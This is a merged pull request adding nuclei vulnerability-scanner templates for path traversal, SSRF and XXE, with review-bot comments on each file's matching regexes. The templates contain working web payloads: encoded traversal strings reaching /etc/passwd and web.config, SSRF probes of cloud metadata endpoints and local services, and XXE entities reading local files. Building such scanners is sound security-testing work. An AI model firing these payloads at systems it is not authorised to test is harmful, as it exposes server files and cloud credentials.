
Create ssrf.yaml,xxe.yaml,pathtraversal.yaml #16

Merged
merged 1 commit into from
Mar 6, 2023
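--- a/pathtraversal/pathtraversal.yaml
+++ b/pathtraversal/pathtraversal.yaml
@@ -0,0 +1,134 @@
+id: pathtraversal
+
+info:
+name: pathtraversal Detection
+author: pwnhxl
+severity: medium
+reference:
+- https://owasp.org/www-community/attacks/Unicode_Encoding
+tags: dast,pathtraversal
+
+variables:
+fuzz: "../../../../../../../../../../../../../../../"
+fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f"
+fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f"
+fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF"
+fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF"
+fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../"
+fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\'
+fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../"
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}"
+
+payloads:
+pathtraversal:
+- '/etc/passwd'
+- 'c:/windows/win.ini'
+- '../etc/passwd'
+- '../../etc/passwd'
+- '../../../etc/passwd'
+- '../../../../etc/passwd'
+- '../../../../../etc/passwd'
+- '../../../../../../etc/passwd'
+- '../../../../../../../etc/passwd'
+- '../../../../../../../../etc/passwd'
+- '../../../../../../../../../etc/passwd'
+- '../../../../../../../../../../etc/passwd'
+- '../../../../../../../../../../../etc/passwd'
+- '../../../../../../../../../../../../etc/passwd'
+- '../../../../../../../../../../../../../etc/passwd'
+- '../../../../../../../../../../../../../../etc/passwd'
+- '{{fuzz}}etc/passwd'
+- '{{fuzz}}windows/win.ini'
+- '/etc/passwd%00.jpg'
+- 'c:/windows/win.ini%00.jpg'
+- '{{fuzz}}etc/passwd%00.jpg'
+- '{{fuzz}}windows/win.ini%00.jpg'
+- '{{fuzz_urlx2_encode}}etc%252fpasswd'
+- '{{fuzz_urlx2_encode}}windows%252fwin.ini'
+- '{{fuzz_hex_unicode}}etc%u002fpasswd'
+- '{{fuzz_hex_unicode}}windows%u002fwin.ini'
+- '{{fuzz_utf8_unicode}}etc%C0%AFpasswd'
+- '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini'
+- '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd'
+- '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini'
+- '{{fuzz_bypass_replace}}etc/passwd'
+- '{{fuzz_bypass_replace}}windows/win.ini'
+- '{{fuzz_bypass_replace_windows}}windows\win.ini'
+- '{{fuzz_bypass_waf_regx}}etc/passwd'
+- '{{fuzz_bypass_waf_regx}}windows/win.ini'
+- './web.config'
+- '../web.config'
+- '../../web.config'
+- './WEB-INF/web.xml'
+- '../WEB-INF/web.xml'
+- '../../WEB-INF/web.xml'
+
+fuzzing:
+- part: query
+mode: single
+keys:
+- cat
+- dir
+- action
+- board
+- date
+- detail
+- file
+- download
+- path
+- folder
+- prefix
+- include
+- page
+- inc
+- locate
+- show
+- doc
+- site
+- type
+- view
+- content
+- document
+- layout
+- mod
+- conf
+- url
+- img
+- image
+- images
+fuzz:
+- "{{pathtraversal}}"
+
+- part: query
+mode: single
+values:
+- "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$"
+fuzz:
+- "{{pathtraversal}}"
+
+stop-at-first-match: true
+matchers-condition: or
+matchers:
+- type: regex
+part: body
+regex:
+- 'root:.*?:[0-9]*:[0-9]*:'
+
+- type: word
+part: body
+words:
+- 'for 16-bit app support'
+
+- type: regex
+part: body
+regex:
+- '(<web-app[\s\S]+<\/web-app>)'
+
+- type: regex
+part: body
+regex:
+- '(<system.webServer[\s\S]+<\/system.webServer>)'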
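Review bot: The `values:` filter regex of the second fuzzing entry leaves its dots unescaped, so `^(./|../|/)` accepts any value whose second or third character is `/` and `(.html|…)$` accepts suffixes such as `xhtml`, which widens the set of parameters the payload list is fired at and adds scan noise rather than precision. Escaping them requires switching to single quotes, because `\.` is not a legal escape inside a YAML double-quoted scalar: `- '^(\./|\.\./|/)|(\.html|\.htm|\.xml|\.conf|\.cfg|\.log|\.txt|\.pdf|\.doc|\.docx|\.xls|\.csv|\.png|\.jpg|\.gif)$'`. The unescaped dot in `<system.webServer` in the last matcher is harmless but would be `<system\.webServer` for consistency. The `info` block also has no `description`, which nuclei's `info` section supports; something like `description: Detects path traversal by fuzzing file-like query parameters and matching on the contents of well-known system and configuration files.` would do, and `name: pathtraversal Detection` could be capitalised like `SSRF Detection` and `XXE Detection` in the sibling templates.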
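--- a/ssrf/ssrf.yaml
+++ b/ssrf/ssrf.yaml
@@ -0,0 +1,116 @@
+id: ssrf
+
+info:
+name: SSRF Detection
+author: pwnhxl
+severity: medium
+tags: dast,ssrf
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}"
+
+payloads:
+ssrf:
+- 'file:////./etc/./passwd'
+- 'file:///c:/./windows/./win.ini'
+- 'http://metadata.tencentyun.com/latest/meta-data/'
+- 'http://100.100.100.200/latest/meta-data/'
+- 'http://169.254.169.254/latest/meta-data/'
+- 'http://169.254.169.254/metadata/v1'
+- 'http://127.0.0.1:22'
+- 'http://127.0.0.1:3306'
+- 'dict://127.0.0.1:6379/info'
+
+fuzzing:
+- part: query
+mode: single
+keys:
+- callback
+- continue
+- data
+- dest
+- dir
+- domain
+- feed
+- host
+- html
+- navigation
+- next
+- open
+- out
+- page
+- path
+- port
+- redirect
+- reference
+- return
+- show
+- site
+- to
+- uri
+- url
+- val
+- validate
+- view
+- window
+- file
+- imgurl
+fuzz:
+- "{{ssrf}}"
+
+- part: query
+mode: single
+values:
+- "(https|http|file)(%3A%2F%2F|://)(.*?)"
+fuzz:
+- "{{ssrf}}"
+
+stop-at-first-match: true
+matchers-condition: or
+matchers:
+- type: regex
+part: body
+regex:
+- 'SSH-(\d.\d)-OpenSSH_(\d.\d)'
+
+- type: regex
+part: body
+regex:
+- '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'
+
+- type: regex
+part: body
+regex:
+- '(\d.\d.\d)(.*?)mysql_native_password'
+
+- type: regex
+part: body
+regex:
+- 'root:.*?:[0-9]*:[0-9]*:'
+
+- type: word
+part: body
+words:
+- 'for 16-bit app support'
+
+- type: regex
+part: body
+regex:
+- 'dns-conf/(.*?)instance/'
+
+- type: regex
+part: body
+regex:
+- 'app-id(.*?)placement/'
+
+- type: regex
+part: body
+regex:
+- 'ami-id(.*?)placement/'
+
+- type: regex
+part: body
+regex:
+- 'id(.*?)interfaces/'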
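Review bot: The last matcher, `'id(.*?)interfaces/'`, is loose enough to fire on ordinary HTML: with `matchers-condition: or` a single hit reports the host, and any response body containing the letters `id` (an `id=` attribute is enough) followed somewhere later by a path ending in `interfaces/` satisfies it regardless of what the payload did. Anchoring on the full metadata key name, e.g. `- 'instance-id(.*?)interfaces/'`, removes most of that false-positive surface; `'app-id(.*?)placement/'` has the same weakness to a lesser degree. The unescaped dots in `'SSH-(\d.\d)-OpenSSH_(\d.\d)'` and `'(\d.\d.\d)(.*?)mysql_native_password'` are harmless but should be `\d\.\d` for precision. Unlike the other two templates in this PR, the `info` block here carries neither a `reference` nor a `description`; a one-line `description:` stating that the template probes URL-taking query parameters and matches on well-known local-service and cloud-metadata responses would help whoever triages its findings.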
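--- a/xxe/xxe.yaml
+++ b/xxe/xxe.yaml
@@ -0,0 +1,50 @@
+id: xxe
+
+info:
+name: XXE Detection
+author: pwnhxl
+severity: medium
+reference:
+- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
+tags: dast,xxe
+
+variables:
+rletter: "{{rand_base(6,'abc')}}"
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}"
+
+payloads:
+xxe:
+- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
+- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
+
+fuzzing:
+- part: query
+mode: single
+keys-regex:
+- "(.*?)xml(.*?)"
+fuzz:
+- "{{xxe}}"
+
+- part: query
+mode: single
+values:
+- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
+fuzz:
+- "{{xxe}}"
+
+stop-at-first-match: true
+matchers-condition: or
+matchers:
+- type: regex
+part: body
+regex:
+- 'root:.*?:[0-9]*:[0-9]*:'
+
+- type: word
+part: body
+words:
+- 'for 16-bit app support'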
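Review bot: In the second fuzzing entry the `values:` regex branch `<?xml` does not match an XML declaration: the `?` quantifies the preceding `<`, so the branch degenerates to `xml` with an optional `<`, and any parameter value containing `xml` followed later by `>` passes the filter, which is broader than the encoded twin `%3C%3Fxml` next to it. The intended form is `<\?xml`, and because `\?` is not a valid escape in a YAML double-quoted scalar the line should move to single quotes: `- '(<!DOCTYPE|<\?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>'`. Separately, `rletter` is used three times in each payload as both the entity name and the `&…;` reference; this only works if `{{rletter}}` is expanded once per request rather than once per occurrence — presumably the case for nuclei variables, but worth confirming, since a per-occurrence expansion would make the reference undefined and the probe silently inert. A `description:` in `info` (the other two `info` fields match the sibling templates) would also help readers understand that the markers are the same file-content signatures used by pathtraversal/pathtraversal.yaml.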